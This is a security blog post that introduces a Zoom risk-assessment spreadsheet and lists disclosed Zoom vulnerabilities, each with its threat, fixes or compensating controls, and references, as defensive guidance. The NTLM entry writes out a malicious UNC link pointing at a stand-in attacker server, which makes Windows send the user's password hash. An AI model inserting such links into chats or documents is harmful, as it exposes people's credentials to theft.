Zoom Risk Assessment Toolkit

Today we are publicly releasing our Zoom Risk Assessment Toolkit so that organizations can make a risk-informed decision on whether to use Zoom, what compensating controls to put in place, and to be able to communicate these decisions in terms of business risk.

This work came about because we were asked to help a client answer the question, “Is Zoom secure enough for our internal meetings?”

Some in the security industry are quick to say “No” or to call out Zoom for their many security vulnerabilities. It is true Zoom has had its share of security issues. The decision here is very business and industry specific. If you are in government, you probably shouldn’t be using Zoom because it lacks end-to-end encryption and hosts some infrastructure in China. If you are in healthcare, you probably shouldn’t discuss protected health information in a Zoom meeting because of the lack of end-to-end encryption. You will want to evaluate your use of Zoom and other video conferencing technology in terms of the specific business use case and your organization’s risk tolerance.

Keeping track of all of the Zoom weaknesses being discussed in the media can be dizzying. Dissecting each risk into its corresponding risk components (assets, threat, vulnerability) can help you think logically about the risks and how they apply to your unique use case. Then for any unacceptable risks, evaluate and implement compensating controls or fixes to reduce your risk.

The following is a list of recent Zoom vulnerabilities that we have been able to identify:

Web-Based Mac Webcam and Microphone Hijacking

• Affects – Mac Zoom clients
• Vulnerability – Zoom Mac client versions prior to 4.6.9 (19273.0402) allowed a malicious website to force a Zoom call with the attendee’s webcam and microphone enabled without permission.
• Threat – A malicious website forcing a Zoom call with the attendee’s webcam and microphone enabled
• Fix – Update the Zoom Mac client to the most recent version.
• Date of Public Disclosure – 7/8/19
• Reference – Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

Zoom Meeting ID Brute Force

• Affects – All Zoom meetings
• Vulnerability – Zoom meeting IDs consist of 9 to 11 digits which is a space of up to 10^11 = 100,000,000,000. This space can be brute forced to identify valid meeting IDs. Researchers were able to predict ~4% of randomly generated meeting IDs.
• Threat – Attacker brute forcing Zoom meeting IDs to gain unauthorized access to open meetings.
• Compensating Controls
• Use passwords on Zoom meetings to prevent unauthorized access.
• Do not publish meeting details including password on social media or other non-private mediums.
• Date of Public Disclosure – 7/22/19
• Reference – ‘War Dialing’ Tool Exposes Zoom’s Password Problems

Mac privilege escalation using Zoom

• Affects – Mac Zoom clients
• Threat – Non-privileged user subverting the ‘runwithroot’ script to escalate privileges. Requires local access to the system to exploit.
• Vulnerability – Zoom Mac client versions prior to 4.6.9 (19273.0402) create a ‘runwithroot’ file in a user-writable directory as part of the install process. The contents of this file are executed as root. A malicious attacker can modify this file to achieve privilege escalation.
• Fix – Update the Zoom Mac client to the most recent version.
• Date of Public Disclosure – 3/30/20
• Reference – The ‘S’ in Zoom, Stands for Security, uncovering (local) security flaws in Zoom’s latest macOS client

Mac unauthorized webcam and mic access using library injection

• Affects – Mac Zoom clients
• Vulnerability – Zoom Mac client versions prior to 4.6.9 (19273.0402) run with the ‘disable-library-validation’ entitlement that allows for library injection. A malicious library injected into the Zoom trusted process context can access the webcam and microphone since Zoom has those privileges, allowing an attacker to gain unauthorized access to the webcam and microphone.
• Threat – Local malicious user injecting a malicious library into the Zoom trusted process context to gain access to the webcam and microphone
• Fix – Update the Zoom Mac client to the most recent version.
• Date of Public Disclosure – 3/30/20
• Reference – The ‘S’ in Zoom, Stands for Security, uncovering (local) security flaws in Zoom’s latest macOS client

NTLM Password Hash Exposed through malicious UNC path in Zoom chat

• Affects – Windows systems running Zoom
• Vulnerability – Zoom displays UNC paths as clickable links in the chat window. If a meeting attendee clicks on a UNC path like “\\evil.server.com\anything” or “smb:\\evil.server.com\anything”, the attendee’s Windows system will attempt to authenticate to the evil.server.com SMB service, submitting the logged on user’s password hash. This only affects Windows-based systems
• Threat – Malicious Zoom meeting attendee inserting a malicious UNC path of the form “\\evil.server.com\anything” or “smb:\\evil.server.com\anything”
• Compensating Controls:
• Use passwords on Zoom meetings to prevent malicious actors from joining.
• Prevent NTLM credentials from being sent to remote servers using the ‘Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers’ group policy setting. Set it to Deny All.
• Train users to not click on untrusted links in Zoom meetings, using the same precautions taken with email links. Do not click on links in Zoom meetings that start with “\\” or “smb:\\”.
• Date of Public Disclosure – 3/31/20
• Reference – Zoom Lets Attackers Steal Windows Credentials, Run Programs via UNC Links (Bleeping Computer)

Unencrypted communication with phone and H.323/SIP devices

• Affects – Zoom meetings with dial-in attendees and attendees using H.323/SIP devices
• Vulnerability – Attendees connecting through a phone number or H.323/SIP device without encryption leave Zoom meeting content unencrypted between these devices and the Zoom cloud.
• Threat – An attacker able to eavesdrop on a phone call or man-in-the-middle H.323/SIP device traffic can gain access to Zoom meeting communication.
• Compensating Controls:
• For preventing attendees from dialing in, when scheduling a meeting set the Audio Type to “Computer Audio” instead of “Telephone and Computer Audio”.
• For H.323/SIP devices, follow Zoom’s instructions for requiring encryption – https://support.zoom.us/hc/en-us/articles/201362723/
• Date of Public Disclosure – N/A
• Reference – The Facts Around Zoom and Encryption for Meetings/Webinars (Zoom Blog)

Lacking end-to-end encryption

• Affects – All Zoom meetings
• Vulnerability – No Zoom meeting is end-to-end encrypted. All video, audio, and files are encrypted between the Zoom client and the Zoom cloud, and also encrypted when sent from the Zoom cloud to the recipient Zoom client; however, Zoom manages the keys for encryption and can technically decrypt this communication. Most of Zoom’s developers are based in China, and some of its key management infrastructure is in China. A malicious actor in the Zoom cloud could intercept meeting contents. Also, Zoom can be compelled by a court order to provide decrypted data to a government.
• Threat – A threat actor in the Zoom cloud accessing decrypted meeting contents.
• Compensating Controls:
• Zoom Meeting Connector allows organizations to deploy a Zoom multimedia router on their internal network to keep all audio, video, and data sharing within the internal network. Meeting metadata is still managed in the Zoom cloud.
• True end-to-end encryption is possible for Chat contents in Zoom. Follow Zoom’s instructions here – https://support.zoom.us/hc/en-us/articles/207599823-End-To-End-Encryption-for-Chat
• Date of Public Disclosure – 3/31/20
• Reference – So Wait, How Encrypted Are Zoom Meetings Really? (Wired)

So now for the toolkit. The Excel workbook has three worksheets — a Risk Register, Risk Matrix, and Impact & Likelihood Definitions. For each Risk in the Risk Register you will want to evaluate the Impact Level and Likelihood Level. Consider your specific use of Zoom. The Impact and Likelihood scores that are pre-populated are for an example company. For instance, if nobody in your organization uses a Mac, you can lower the Likelihood of the Mac-only risks to zero. If you are an educational institution and meetings are not confidential, you may lower the Impact level associated with encryption weaknesses.

Also, different use cases may have different risk profiles. For example, if you conduct public meetings with Zoom but also host private small group meetings, you may choose to perform a risk assessment for each use case. Some risks may be acceptable for the public meetings but not acceptable for the private meetings.

And can you please do me a favor? If you find this information valuable, can you please give it a like or share? Much appreciated!

Download the Zoom Risk Assessment [158KB] Excel Workbook

Have we missed anything? If you have a correction, suggestion, or question about this work, please drop us a line at our Contact Us page.

To Your Security,
Geoff